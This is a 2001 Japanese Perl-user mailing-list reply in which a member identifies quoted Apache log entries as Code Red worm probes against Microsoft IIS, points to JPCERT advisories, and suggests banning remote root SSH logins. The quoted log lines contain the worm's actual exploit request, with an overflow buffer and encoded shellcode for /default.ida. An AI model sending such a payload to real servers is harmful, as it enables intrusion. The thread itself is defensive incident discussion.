[kansaipm] ハッキングされた?
MORIMOTO Hidenobu
hmorimoto at enncorp.co.jp
Fri Aug 10 00:17:42 CDT 2001
森本と申します。
>/var/log/httpd/access_log に以下のようなアクセスが、断続的に入ってきます。
>IPアドレスは、毎回変わっています。
>
>211.35.8.2 - - [10/Aug/2001:00:01:24 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
>211.5.170.131 - - [10/Aug/2001:00:01:58 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
>211.21.250.149 - - [10/Aug/2001:00:09:15 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
>211.187.225.224 - - [10/Aug/2001:00:09:25 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
IISを狙った、Red Codeがアタックをかけているログだと思います。
Apacheであれば大丈夫だと思いますが、詳しくは以下のポインタにてご確認
ください。
"Code Red" Worm の伝播活動再開に関する注意喚起
http://www.jpcert.or.jp/at/2001/at010017.txt
Microsoft IIS サーバの脆弱性を使って伝播するワーム
http://www.jpcert.or.jp/at/2001/at010018.txt
"Code Red" Worm の変種に関する注意喚起
http://www.jpcert.or.jp/at/2001/at010019.txt
緊急報告 - Microsoft IIS の脆弱性を使って伝播するワーム "Code Red II"
http://www.jpcert.or.jp/at/2001/at010020.txt
上記情報が各ニュースサイト、メールなどで取り上げられていることをかん
がみるに、現段階でこれらの情報を取得しておられないならば、セキュリティ
情報を取得するためのなんらかの手段を講じられることをお勧めいたします。
(今回はIIS対象であるため、ご存知なかっただけなら申し訳ありません)
>Subject: sshd-203.95.215.124
こちらの方はわからないのですが、念のため、外部からrootでログインして
きた人がいないかどうか、チェックされてはいかがでしょうか?
メールの文言を頼りにするならば、
> On since Mon Aug 6 15:14 (CST) on tty1 3 days 13 hours idle
ここいらへんが怪しいのかもしれません。
こちらも外部からのrootログインは禁止されることをお勧めします。
可能ならば、一般ユーザも固定されたIPからのみログインを許可し、原則禁
止とされた方がいいと思います。
--
森本 英伸 mailto:hmorimoto at enncorp.co.jp
ENN Corp. http://www.enncorp.co.jp
TEL 06-6766-2551 FAX 06-6766-2557
More information about the Kansai-pm
mailing list